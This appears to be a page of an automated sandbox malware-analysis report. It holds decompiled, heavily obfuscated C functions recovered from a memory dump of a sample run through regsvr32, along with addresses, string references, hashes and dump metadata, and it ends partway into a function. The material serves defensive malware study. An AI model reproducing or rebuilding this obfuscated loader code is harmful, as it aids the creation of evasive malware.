										_v68 = _v68 ^ 0xdcd5e62e;
										_v76 = 0xe10bff;
										_v76 = _v76 * 0x70;
										_v76 = _v76 >> 5;
										_v76 = _v76 ^ 0x03121ed5;
										E003CAE19(_t210, _a8, _t229, _v72, _v68, _v76);
										_t175 = 0x6414;
										goto L1;
									} else {
										if(_t175 == 0x7cb69) {
											_v76 = 0x8b19e6;
											_t211 = 0x6e;
											_v76 = _v76 * 0x32;
											_t212 = 0x28;
											_v76 = _v76 / _t211;
											_v76 = _v76 ^ 0x00378a7a;
											_a8 = 0x6d540d;
											_a8 = _a8 << 7;
											_a8 = _a8 >> 2;
											_a8 = _a8 << 0xa;
											_a8 = _a8 ^ 0xaa0e9a02;
											_v72 = 0xd12e54;
											_t210 = _t228 + 0x24;
											_v72 = _v72 / _t212;
											_v72 = _v72 ^ 0x000e5a78;
											E003C2050(_t210, _v76, __eflags,  &_v52, _a8, _v72);
											_t231 =  &(_t231[3]);
											_t175 = 0x28a4f;
											continue;
										} else {
											_t239 = _t175 - 0xfb908;
											if(_t175 != 0xfb908) {
												L16:
												__eflags = _t175 - 0xa25ec;
												if(__eflags != 0) {
													continue;
												} else {
												}
											} else {
												_v76 = 0x89808;
												_v76 = _v76 >> 6;
												_v76 = _v76 ^ 0x000db78c;
												_v72 = 0x40d24d;
												_v72 = _v72 << 2;
												_v72 = _v72 ^ 0x0104fbbd;
												_a8 = 0x6c1769;
												_a8 = _a8 + 0x7fa5;
												_push(_t210);
												_a8 = _a8 * 0x5c;
												_a8 = _a8 | 0x47c327c2;
												_a8 = _a8 ^ 0x67c9795e;
												_t202 = E003C8D52(_t210, _t229[1], _t239);
												 *_t229 = _t202;
												_t210 = _t210;
												if(_t202 != 0) {
													_t175 = 0x54d52;
													continue;
												}
											}
										}
									}
								}
							}
						}
						__eflags =  *_t229;
						_t172 =  *_t229 != 0;
						__eflags = _t172;
						return 0 | _t172;
					}
					_v76 = 0x7adb58;
					_v76 = _v76 + 0x712b;
					_v76 = _v76 >> 5;
					_v76 = _v76 | 0x8d2bd46a;
					_v76 = _v76 ^ 0x8d23dbfa;
					_a8 = 0xfbbb89;
					_a8 = _a8 >> 0xc;
					_a8 = _a8 + 0xffffa63c;
					_a8 = _a8 + 0xd4ce;
					_a8 = _a8 ^ 0x000d3713;
					_v68 = 0x5f3842;
					_t122 =  &_v68; // 0x5f3842
					_v68 =  *_t122 * 0x28;
					_v68 = _v68 ^ 0x0ee26666;
					_v72 = 0xbeb5e6;
					_v72 = _v72 ^ 0x39a1d840;
					_v72 = _v72 | 0xad62ecf6;
					_t132 =  &_v72;
					 *_t132 = _v72 ^ 0xbd743216;
					__eflags =  *_t132;
					E003C2DB8( *((intOrPtr*)(_t228 + 0x10)), _v76, _a8, _v68, _v72,  &_v52);
					_t231 =  &(_t231[4]);
					_t175 = 0x7cb69;
					goto L16;
				}
			}

0x003cdae6
0x003cdae6
0x003cdaeb
0x003cdaf0
0x003cdaf1
0x003cdaf5
0x003cdaf7
0x003cdaf8
0x003cdaf9
0x003cdafe
0x003cdb06
0x003cdb0b
0x003cdb18
0x003cdb20
0x003cdb20
0x003cdb20
0x003cdb23
0x003cdb33
0x003cdd32
0x003cdd35
0x003cdd37
0x00000000
0x003cdb39
0x003cdb3e
0x003cddf8
0x003cde09
0x003cde0a
0x003cde0e
0x003cde1f
0x003cde27
0x003cde2f
0x003cde37
0x003cde3f
0x003cde47
0x003cde4c
0x003cde54
0x003cde5c
0x003cde64
0x003cde64
0x003cde64
0x003cde79
0x003cdb44
0x003cdb46
0x003cdd25
0x003cdd28
0x00000000
0x003cdb4c
0x003cdb51
0x003cdc78
0x003cdc82
0x003cdc90
0x003cdc93
0x003cdc97
0x003cdc9b
0x003cdca0
0x003cdca8
0x003cdcb0
0x003cdcb8
0x003cdcc0
0x003cdcc8
0x003cdcd0
0x003cdcd8
0x003cdce0
0x003cdced
0x003cdcf1
0x003cdcf6
0x003cdd0f
0x003cdd14
0x00000000
0x003cdb57
0x003cdb5c
0x003cdbec
0x003cdbfd
0x003cdc00
0x003cdc0a
0x003cdc0b
0x003cdc11
0x003cdc19
0x003cdc21
0x003cdc26
0x003cdc2b
0x003cdc30
0x003cdc38
0x003cdc46
0x003cdc49
0x003cdc51
0x003cdc66
0x003cdc6b
0x003cdc6e
0x00000000
0x003cdb62
0x003cdb62
0x003cdb67
0x003cdde8
0x003cdde8
0x003cdded
0x00000000
0x00000000
0x003cddf3
0x003cdb6d
0x003cdb6d
0x003cdb75
0x003cdb7a
0x003cdb82
0x003cdb8a
0x003cdb8f
0x003cdb97
0x003cdb9f
0x003cdbac
0x003cdbae
0x003cdbb2
0x003cdbba
0x003cdbd1
0x003cdbd6
0x003cdbd9
0x003cdbdc
0x003cdbe2
0x00000000
0x003cdbe2
0x003cdbdc
0x003cdb67
0x003cdb5c
0x003cdb51
0x003cdb46
0x003cdb3e
0x003cde83
0x003cde87
0x003cde87
0x003cde8e
0x003cde8e
0x003cdd40
0x003cdd48
0x003cdd50
0x003cdd55
0x003cdd5d
0x003cdd65
0x003cdd6d
0x003cdd72
0x003cdd7a
0x003cdd82
0x003cdd8a
0x003cdd92
0x003cdd97
0x003cdd9f
0x003cdda7
0x003cddaf
0x003cddb7
0x003cddbf
0x003cddbf
0x003cddbf
0x003cdddb
0x003cdde0
0x003cdde3
0x00000000
0x003cdde3

Strings

a7, xrefs: 003CDE0E
B8_, xrefs: 003CDD92
%, xrefs: 003CDDE8
Tm, xrefs: 003CDC19

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: Tm$B8_$a7$%
API String ID: 0-3079339441
Opcode ID: 278c5344a26f9fe678a2fb275a8d5b86230f3d1be44810484e40e76451b9a0bc
Instruction ID: e0af6ee99e554f4163c3662c69fd0945e88a1891fa9c00d1464f1cbed69c1c30
Opcode Fuzzy Hash: 278c5344a26f9fe678a2fb275a8d5b86230f3d1be44810484e40e76451b9a0bc
Instruction Fuzzy Hash: F79100B55083459FC319DF26D44A95BBBE1FB94714F008E2EF0A69A260D7B8D908CF93

Uniqueness

Uniqueness Score: -1.00%

Function 003DE63C Relevance: 5.2, Strings: 4, Instructions: 188
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E003DE63C(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v128;
				signed int _v132;
				signed int _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				char _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				void* _t161;
				void* _t163;
				char _t164;
				void* _t173;
				char* _t189;
				signed int _t190;
				signed int _t194;
				signed int _t199;
				signed int _t216;
				signed int _t217;

				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003C2528(_t161);
				_v136 = _v136 & 0x00000000;
				_v144 = 0x1f5a5;
				_v132 = _v132 & 0x00000000;
				_t163 = 0xeed8a;
				_v140 = 0xce41e;
				do {
					while(_t163 != 0x15762) {
						if(_t163 == 0x3b78a) {
							_v164 = 0xcdb6b1;
							_t190 = 0x3f;
							_v164 = _v164 / _t190;
							_v164 = _v164 ^ 0xe152b2d9;
							_v164 = _v164 >> 5;
							_v164 = _v164 ^ 0x070a8f09;
							_v148 = _v164;
							_v164 = 0xf1f70b;
							_v164 = _v164 ^ 0xb60f8f3f;
							_v164 = _v164 * 7;
							_v164 = _v164 + 0xffffcc58;
							_v164 = _v164 ^ 0x00f0e791;
							_v160 = 0xb00ab9;
							_v160 = _v160 + 0xffff8610;
							_v160 = _v160 ^ 0x00a149e2;
							E003C70A4( &_v128, _v164, _v160,  &_v148);
							_t163 = 0x15762;
							continue;
						}
						if(_t163 == 0x8763e) {
							_v160 = 0x71b811;
							_v160 = _v160 + 0xffff59fd;
							_v160 = _v160 << 4;
							_v160 = _v160 | 0x634d4508;
							_v160 = _v160 ^ 0x675c65e6;
							_v156 = 0x55ee4f;
							_v156 = _v156 >> 2;
							_v156 = _v156 >> 9;
							_v156 = _v156 | 0xb6a984c5;
							_v156 = _v156 ^ 0xb6a10b14;
							_v164 = 0x302f78;
							_t62 =  &_v164; // 0x302f78
							_t194 = 0x17;
							_v164 =  *_t62 / _t194;
							_v164 = _v164 >> 0xa;
							_v164 = _v164 + 0x9fb5;
							_v164 = _v164 ^ 0x000af79e;
							_t173 = E003E0887(_v160, _v156, _v164, 0x3c151c);
							_v156 = 0xe1b1d9;
							_v156 = _v156 + 0xffffb089;
							_v156 = _v156 ^ 0x00e32dfa;
							_v160 = 0x9c7da5;
							_v160 = _v160 * 0x49;
							_v160 = _v160 ^ 0x2c9532c7;
							E003C7336(_v160, __eflags);
							_v152 = 0x83a45d;
							_t216 = 0x41;
							_v152 = _v152 / _t216;
							_v152 = _v152 ^ 0x000ce5b7;
							_v164 = 0x5aa9a1;
							_v164 = _v164 + 0x78a3;
							_t217 = 0x1c;
							_v164 = _v164 * 0x2b;
							_v164 = _v164 ^ 0x0f4879ec;
							_v160 = 0xe8fef2;
							_v160 = _v160 >> 8;
							_v160 = _v160 * 0x73;
							_v160 = _v160 / _t217;
							_v160 = _v160 ^ 0x0005d9c4;
							_v156 = 0x4b603d;
							_v156 = _v156 + 0xffff6636;
							_v156 = _v156 + 0xffff8556;
							_v156 = _v156 ^ 0x004f3144;
							E003C3E2F(_a4, _v152, _v164, _t173, _v160,  &_v128, _v156);
							_v164 = 0x74fcac;
							_v164 = _v164 + 0x7f02;
							_v164 = _v164 << 3;
							_v164 = _v164 ^ 0x03a9c836;
							_v160 = 0xdbcbdd;
							_v160 = _v160 ^ 0x2581caaa;
							_t199 = 0x65;
							_v160 = _v160 / _t199;
							_v160 = _v160 << 0xf;
							_v160 = _v160 ^ 0x562be0dc;
							_v156 = 0xc39309;
							_v156 = _v156 << 9;
							_v156 = _v156 >> 6;
							_t156 =  &_v156;
							 *_t156 = _v156 ^ 0x02194caf;
							__eflags =  *_t156;
							return E003C43D3(_v164, _v160, _v156, _t173);
						}
						if(_t163 != 0xeed8a) {
							goto L17;
						}
						_t163 = 0x3b78a;
					}
					__eflags = _v128;
					_t189 =  &_v128;
					if(_v128 == 0) {
						L16:
						_t163 = 0x8763e;
						goto L17;
					} else {
						goto L8;
					}
					do {
						L8:
						_t164 =  *_t189;
						__eflags = _t164 - 0x30;
						if(_t164 < 0x30) {
							L10:
							__eflags = _t164 - 0x61;
							if(_t164 < 0x61) {
								L12:
								__eflags = _t164 - 0x41;
								if(_t164 < 0x41) {
									L14:
									 *_t189 = 0x58;
									goto L15;
								}
								__eflags = _t164 - 0x5a;
								if(_t164 <= 0x5a) {
									goto L15;
								}
								goto L14;
							}
							__eflags = _t164 - 0x7a;
							if(_t164 <= 0x7a) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t164 - 0x39;
						if(_t164 <= 0x39) {
							goto L15;
						}
						goto L10;
						L15:
						_t189 = _t189 + 1;
						__eflags =  *_t189;
					} while ( *_t189 != 0);
					goto L16;
					L17:
					__eflags = _t163 - 0xe689f;
				} while (_t163 != 0xe689f);
				return _t163;
			}

0x003de646
0x003de64d
0x003de64e
0x003de64f
0x003de654
0x003de661
0x003de669
0x003de66e
0x003de670
0x003de687
0x003de687
0x003de691
0x003de6a7
0x003de6b7
0x003de6be
0x003de6c2
0x003de6ca
0x003de6cf
0x003de6db
0x003de6df
0x003de6e7
0x003de6f4
0x003de6fc
0x003de704
0x003de70c
0x003de714
0x003de71c
0x003de72d
0x003de734
0x00000000
0x003de734
0x003de695
0x003de77b
0x003de785
0x003de78d
0x003de792
0x003de79a
0x003de7a2
0x003de7aa
0x003de7af
0x003de7b4
0x003de7bc
0x003de7c4
0x003de7cc
0x003de7d2
0x003de7da
0x003de7de
0x003de7e3
0x003de7eb
0x003de7ff
0x003de804
0x003de80e
0x003de816
0x003de81e
0x003de82b
0x003de82f
0x003de83f
0x003de844
0x003de856
0x003de85b
0x003de861
0x003de869
0x003de871
0x003de87e
0x003de87f
0x003de883
0x003de88b
0x003de893
0x003de89d
0x003de8a7
0x003de8af
0x003de8b7
0x003de8bf
0x003de8c7
0x003de8cf
0x003de8f0
0x003de8f5
0x003de8fd
0x003de905
0x003de90a
0x003de912
0x003de91a
0x003de928
0x003de92e
0x003de932
0x003de937
0x003de93f
0x003de947
0x003de94c
0x003de951
0x003de951
0x003de951
0x00000000
0x003de96a
0x003de69d
0x00000000
0x00000000
0x003de6a3
0x003de6a3
0x003de73b
0x003de740
0x003de744
0x003de769
0x003de769
0x00000000
0x00000000
0x00000000
0x00000000
0x003de746
0x003de746
0x003de746
0x003de748
0x003de74a
0x003de750
0x003de750
0x003de752
0x003de758
0x003de758
0x003de75a
0x003de760
0x003de760
0x00000000
0x003de760
0x003de75c
0x003de75e
0x00000000
0x00000000
0x00000000
0x003de75e
0x003de754
0x003de756
0x00000000
0x00000000
0x00000000
0x003de756
0x003de74c
0x003de74e
0x00000000
0x00000000
0x00000000
0x003de763
0x003de763
0x003de764
0x003de764
0x00000000
0x003de76b
0x003de76b
0x003de76b
0x00000000

Strings

OU, xrefs: 003DE7A2
x/0, xrefs: 003DE7CC
e\g, xrefs: 003DE79A
D1O, xrefs: 003DE8CF

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: D1O$OU$x/0$e\g
API String ID: 0-1681642562
Opcode ID: df0c9648325a03ae786707239df42a8f17331d6372021b307f0f333123edbfd9
Instruction ID: 4498b88ff6b526a63308cbc252b73bf58db531816362f8eada026a8533a365ae
Opcode Fuzzy Hash: df0c9648325a03ae786707239df42a8f17331d6372021b307f0f333123edbfd9
Instruction Fuzzy Hash: 178145725083829FC399DF24D54961BBBE1BBD4718F104A1EF0D59A260D3B4CA4ACF83

Uniqueness

Uniqueness Score: -1.00%

Function 003DDFCE Relevance: 5.2, Strings: 4, Instructions: 172
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E003DDFCE(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				void* _t151;
				void* _t153;
				signed int _t160;
				signed int _t177;
				signed int _t178;
				signed int _t179;
				intOrPtr* _t192;
				void* _t193;
				signed int* _t196;

				_push(_a12);
				_t192 = _a4;
				_push(_a8);
				_push(_t192);
				_push(__edx);
				_push(__ecx);
				E003C2528(_t151);
				_v16 = 0x3a98b;
				_t193 = 0;
				_t196 =  &(( &_v44)[5]);
				_v12 = 0x633fc;
				_v4 = _v4 & 0;
				_t153 = 0x7e0ff;
				_v8 = 0xca3be;
				do {
					while(_t153 != 0x77b93) {
						if(_t153 == 0x7e0ff) {
							_t153 = 0x77b93;
							continue;
						} else {
							if(_t153 == 0xa69e6) {
								_v24 = 0xfc3a11;
								_v24 = _v24 >> 0xe;
								_v24 = _v24 ^ 0x000003f1;
								_v44 = 0x4685e7;
								_t178 = 0x37;
								_v44 = _v44 * 0x67;
								_v44 = _v44 >> 8;
								_v44 = _v44 ^ 0x001aa3dc;
								_v40 = 0x79d40;
								_v40 = _v40 + 0x79f2;
								_v40 = _v40 << 0x10;
								_v40 = _v40 >> 0xc;
								_v40 = _v40 ^ 0x0000def9;
								_v32 = 0x6c31ba;
								_v32 = _v32 << 8;
								_v32 = _v32 / _t178;
								_v32 = _v32 ^ 0x01f413fa;
								_v28 = 0x3a5e16;
								_v28 = _v28 << 3;
								_v28 = _v28 + 0x6fbc;
								_v28 = _v28 ^ 0x01dbd674;
								_v36 = 0xe93619;
								_v36 = _v36 + 0x18c1;
								_v36 = _v36 * 0x6e;
								_v36 = _v36 + 0xf68e;
								_t141 =  &_v36;
								 *_t141 = _v36 ^ 0x644beea7;
								__eflags =  *_t141;
								E003C2FCB(_v44, _t178, _v40, _t193, _v32, _t178,  &_v20, _v24, _a8, _v28, _v36);
								 *_t192 = _v20;
							} else {
								_t202 = _t153 - 0xd4b28;
								if(_t153 != 0xd4b28) {
									goto L11;
								} else {
									_v44 = 0x2c7875;
									_v44 = _v44 << 0xe;
									_v44 = _v44 ^ 0xe9b993f2;
									_v44 = _v44 + 0xd915;
									_v44 = _v44 ^ 0xf7a690cc;
									_v32 = 0x9e9815;
									_t179 = 0x1c;
									_push(_t179);
									_v32 = _v32 / _t179;
									_v32 = _v32 ^ 0x00038a63;
									_v28 = 0x38100d;
									_v28 = _v28 >> 1;
									_v28 = _v28 ^ 0x001cb9b5;
									_push(_t179);
									_t193 = E003C8D52(_t179, _v20, _t202);
									if(_t193 != 0) {
										_t153 = 0xa69e6;
										continue;
									}
								}
							}
						}
						L14:
						return _t193;
					}
					_v40 = 0x1fdca1;
					_v40 = _v40 | 0xe3bcd00b;
					_v40 = _v40 + 0x27b9;
					_t177 = 9;
					_v40 = _v40 / _t177;
					_v40 = _v40 ^ 0x194e3961;
					_v28 = 0x53a2c7;
					_v28 = _v28 * 0x2e;
					_v28 = _v28 + 0x3fc1;
					_v28 = _v28 ^ 0x0f09d020;
					_v32 = 0x28df17;
					_v32 = _v32 + 0xffff106d;
					_v32 = _v32 >> 7;
					_v32 = _v32 ^ 0x000700e8;
					_v36 = 0xb58427;
					_v36 = _v36 << 0xa;
					_v36 = _v36 * 0x2a;
					_v36 = _v36 + 0xffff62f4;
					_v36 = _v36 ^ 0x1eb08a28;
					_v44 = 0x796ba;
					_v44 = _v44 + 0xfbd4;
					_v44 = _v44 << 0xc;
					_v44 = _v44 << 6;
					_v44 = _v44 ^ 0x4a371d5f;
					_v24 = 0x1bcc72;
					_v24 = _v24 * 0x3d;
					_v24 = _v24 ^ 0x0696697c;
					_t160 = E003C2FCB(_v28, _t177, _v32, 0, _v36, _t177,  &_v20, _v40, _a8, _v44, _v24);
					_t196 =  &(_t196[0xa]);
					__eflags = _t160;
					if(__eflags == 0) {
						_t153 = 0x65d41;
						goto L11;
					} else {
						_t153 = 0xd4b28;
						continue;
					}
					goto L14;
					L11:
					__eflags = _t153 - 0x65d41;
				} while (__eflags != 0);
				goto L14;
			}

0x003ddfd5
0x003ddfd9
0x003ddfdd
0x003ddfe1
0x003ddfe2
0x003ddfe3
0x003ddfe4
0x003ddfe9
0x003ddff1
0x003ddff3
0x003ddff6
0x003ddffe
0x003de002
0x003de007
0x003de019
0x003de019
0x003de026
0x003de0c1
0x00000000
0x003de02c
0x003de02e
0x003de1e6
0x003de1f0
0x003de1f5
0x003de1fd
0x003de20c
0x003de20d
0x003de211
0x003de216
0x003de21e
0x003de226
0x003de22e
0x003de233
0x003de238
0x003de240
0x003de248
0x003de253
0x003de257
0x003de25f
0x003de267
0x003de26c
0x003de274
0x003de27c
0x003de284
0x003de291
0x003de299
0x003de2a1
0x003de2a1
0x003de2a1
0x003de2c9
0x003de2d5
0x003de034
0x003de034
0x003de039
0x00000000
0x003de03f
0x003de03f
0x003de049
0x003de04e
0x003de056
0x003de05e
0x003de066
0x003de074
0x003de077
0x003de078
0x003de07c
0x003de084
0x003de08c
0x003de090
0x003de0a8
0x003de0ae
0x003de0b4
0x003de0ba
0x00000000
0x003de0ba
0x003de0b4
0x003de039
0x003de02e
0x003de2d8
0x003de2e0
0x003de2e0
0x003de0c8
0x003de0d2
0x003de0da
0x003de0e8
0x003de0eb
0x003de0ef
0x003de0f7
0x003de104
0x003de108
0x003de110
0x003de118
0x003de120
0x003de128
0x003de12d
0x003de135
0x003de13d
0x003de147
0x003de14b
0x003de153
0x003de15b
0x003de163
0x003de16b
0x003de170
0x003de175
0x003de17d
0x003de18a
0x003de192
0x003de1bb
0x003de1c0
0x003de1c3
0x003de1c5
0x003de1d1
0x00000000
0x003de1c7
0x003de1c7
0x00000000
0x003de1c7
0x00000000
0x003de1d6
0x003de1d6
0x003de1d6
0x00000000

Strings

i, xrefs: 003DE014
(K, xrefs: 003DE1C7
(K, xrefs: 003DE034
ux,, xrefs: 003DE03F

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: (K$(K$ux,$i
API String ID: 0-1607070620
Opcode ID: 058580e32f4c35c1aa452926de5d5f63c5c474a00347dfbb7e9ff8364683df86
Instruction ID: 3a38c363d0936f7d5419fe393cef513c429a3a930a67ee36b926c0b9a8663866
Opcode Fuzzy Hash: 058580e32f4c35c1aa452926de5d5f63c5c474a00347dfbb7e9ff8364683df86
Instruction Fuzzy Hash: 888130725083429FC315DF65D94990FBBE5FB98708F000E1EF199AA260C3B9CA19CB97

Uniqueness

Uniqueness Score: -1.00%

Function 003C5FA3 Relevance: 5.2, Strings: 4, Instructions: 169
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E003C5FA3(intOrPtr* __ecx, signed int* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void* _t145;
				void* _t147;
				signed int _t160;
				intOrPtr* _t170;
				signed int _t172;
				signed int _t174;
				signed int _t175;
				signed int _t176;
				intOrPtr* _t190;
				signed int* _t191;
				signed int* _t194;

				_t170 = __ecx;
				_push(_a12);
				_t190 = _a4;
				_t191 = __edx;
				_push(_a8);
				_push(_t190);
				_push(__edx);
				_push(__ecx);
				E003C2528(_t145);
				_t194 =  &(( &_v68)[5]);
				_v56 = 0x50f65;
				_t147 = 0x32e17;
				do {
					while(_t147 != 0x32e17) {
						if(_t147 == 0x5e0c6) {
							_v56 = 0xe9fc4b;
							_v56 = _v56 + 0x5c04;
							_v56 = _v56 >> 0xa;
							_v56 = _v56 ^ 0x000c2fad;
							_v64 = 0xfe2e4;
							_v64 = _v64 + 0x48b5;
							_v64 = _v64 ^ 0x001be8ab;
							_v60 = 0xc7b057;
							_v60 = _v60 | 0xf4b1b2d5;
							_t138 =  &_v60;
							 *_t138 = _v60 ^ 0xf4fcdaa5;
							__eflags =  *_t138;
							E003C2050(_t190 + 4, _v56,  *_t138,  &_v52, _v64, _v60);
						} else {
							if(_t147 == 0x87f93) {
								_v68 = 0x4e15ba;
								_v68 = _v68 + 0x3933;
								_v68 = _v68 ^ 0x004427b5;
								_v56 = 0x712322;
								_t90 =  &_v56; // 0x712322
								_t172 = 0x14;
								_t170 =  &_v52;
								_v56 =  *_t90 / _t172;
								_t97 =  &_v56; // 0x712322
								_v56 =  *_t97 * 0x2e;
								_v56 = _v56 ^ 0x010fc62c;
								_v60 = 0xf62eee;
								_v60 = _v60 << 0xc;
								_v60 = _v60 >> 5;
								_v60 = _v60 >> 9;
								_v60 = _v60 ^ 0x000ec882;
								_v64 = 0xb56f83;
								_v64 = _v64 + 0x6c22;
								_v64 = _v64 ^ 0x00b8344d;
								E003CAE19(_t170, _v68, _t191, _v56, _v60, _v64);
								_t194 =  &(_t194[4]);
								_t147 = 0xdc7c0;
								continue;
							} else {
								if(_t147 == 0xc0d0e) {
									_v60 = 0xe64187;
									_v60 = _v60 + 0xffff7f3c;
									_v60 = _v60 + 0xffff301c;
									_v60 = _v60 ^ 0xc087c7d8;
									_v60 = _v60 ^ 0xc06d6072;
									_v64 = 0xc40baf;
									_v64 = _v64 ^ 0x5af010c5;
									_push(_t170);
									_v64 = _v64 * 0x5d;
									_v64 = _v64 << 0xb;
									_v64 = _v64 ^ 0x6fac17c5;
									_v68 = 0x292426;
									_v68 = _v68 + 0x713;
									_v68 = _v68 | 0xeb3b6ed9;
									_v68 = _v68 + 0xffff86be;
									_v68 = _v68 ^ 0xeb333468;
									_t160 = E003C8D52(_t170, _t191[1], __eflags);
									 *_t191 = _t160;
									_t170 = _t170;
									__eflags = _t160;
									if(__eflags != 0) {
										_t147 = 0x87f93;
										continue;
									}
								} else {
									if(_t147 == 0xdc193) {
										_t170 = _t190;
										_t191[1] = E003D0A27(_t170);
										_t147 = 0xc0d0e;
										continue;
									} else {
										if(_t147 != 0xdc7c0) {
											goto L13;
										} else {
											_v68 = 0x58d89d;
											_t174 = 0x69;
											_v68 = _v68 / _t174;
											_t175 = 0x50;
											_v68 = _v68 / _t175;
											_v68 = _v68 | 0x1be46020;
											_v68 = _v68 ^ 0x1becdb39;
											_v56 = 0xd3cc49;
											_v56 = _v56 | 0xf4fbc3bd;
											_v56 = _v56 ^ 0x83f60605;
											_v56 = _v56 ^ 0x7703895d;
											_v64 = 0xe43acc;
											_v64 = _v64 ^ 0x71dcd53e;
											_v64 = _v64 | 0xa036c113;
											_v64 = _v64 ^ 0xf137e295;
											_v60 = 0x5f46e3;
											_v60 = _v60 ^ 0x6315a288;
											_t176 = 0x6f;
											_v60 = _v60 / _t176;
											_v60 = _v60 ^ 0x00eee4a3;
											_t170 =  *_t190;
											E003C2DB8(_t170, _v68, _v56, _v64, _v60,  &_v52);
											_t194 =  &(_t194[4]);
											_t147 = 0x5e0c6;
											continue;
										}
									}
								}
							}
						}
						L16:
						__eflags =  *_t191;
						_t144 =  *_t191 != 0;
						__eflags = _t144;
						return 0 | _t144;
					}
					 *_t191 =  *_t191 & 0x00000000;
					_t147 = 0xdc193;
					_t119 =  &(_t191[1]);
					 *_t119 = _t191[1] & 0x00000000;
					__eflags =  *_t119;
					L13:
					__eflags = _t147 - 0x811ba;
				} while (__eflags != 0);
				goto L16;
			}

0x003c5fa3
0x003c5fa9
0x003c5fad
0x003c5fb1
0x003c5fb3
0x003c5fb7
0x003c5fb8
0x003c5fb9
0x003c5fba
0x003c5fbf
0x003c5fc2
0x003c5fca
0x003c5fd4
0x003c5fd4
0x003c5fe4
0x003c6243
0x003c624f
0x003c625a
0x003c625f
0x003c6267
0x003c626f
0x003c6277
0x003c627f
0x003c6287
0x003c628f
0x003c628f
0x003c628f
0x003c62a4
0x003c5fea
0x003c5fec
0x003c618c
0x003c6196
0x003c619e
0x003c61a6
0x003c61ae
0x003c61b4
0x003c61b7
0x003c61bb
0x003c61bf
0x003c61c4
0x003c61c8
0x003c61d0
0x003c61d8
0x003c61dd
0x003c61e2
0x003c61e7
0x003c61ef
0x003c61f7
0x003c61ff
0x003c6218
0x003c621d
0x003c6220
0x00000000
0x003c5ff2
0x003c5ff7
0x003c60ed
0x003c60f5
0x003c60fd
0x003c6105
0x003c610d
0x003c6115
0x003c611d
0x003c612a
0x003c612c
0x003c6130
0x003c6135
0x003c613d
0x003c6145
0x003c614d
0x003c6155
0x003c615d
0x003c6174
0x003c6179
0x003c617c
0x003c617d
0x003c617f
0x003c6185
0x00000000
0x003c6185
0x003c5ffd
0x003c6002
0x003c60d9
0x003c60e0
0x003c60e3
0x00000000
0x003c6008
0x003c600d
0x00000000
0x003c6013
0x003c6013
0x003c6023
0x003c6028
0x003c6032
0x003c6037
0x003c603d
0x003c6045
0x003c604d
0x003c6055
0x003c605d
0x003c6065
0x003c606d
0x003c6075
0x003c607d
0x003c6085
0x003c608d
0x003c6095
0x003c60a1
0x003c60a4
0x003c60ac
0x003c60c5
0x003c60c7
0x003c60cc
0x003c60cf
0x00000000
0x003c60cf
0x003c600d
0x003c6002
0x003c5ff7
0x003c5fec
0x003c62ac
0x003c62ae
0x003c62b2
0x003c62b2
0x003c62b9
0x003c62b9
0x003c622a
0x003c622d
0x003c6232
0x003c6232
0x003c6232
0x003c6236
0x003c6236
0x003c6236
0x00000000

Strings

"#q, xrefs: 003C61AE
"l, xrefs: 003C61F7
39, xrefs: 003C6196
h43, xrefs: 003C6165

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: "#q$"l$39$h43
API String ID: 0-2569951205
Opcode ID: 5a5dfa48ba901ed6f47f1f39494fc98d9f899400956c4344004bb3a649d451ad
Instruction ID: dea917cbdc981d831971698e0cbd40ef74f13549ca156a1415a69e14f43b21f6
Opcode Fuzzy Hash: 5a5dfa48ba901ed6f47f1f39494fc98d9f899400956c4344004bb3a649d451ad
Instruction Fuzzy Hash: F37110711083029FC319CF20E94A91BBBE1ABD4B54F108D2DF0A696261D3B5DA5D8FA3

Uniqueness

Uniqueness Score: -1.00%

Function 003D0B84 Relevance: 5.2, Strings: 4, Instructions: 164
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E003D0B84() {
				char _v524;
				void* _v536;
				intOrPtr _v540;
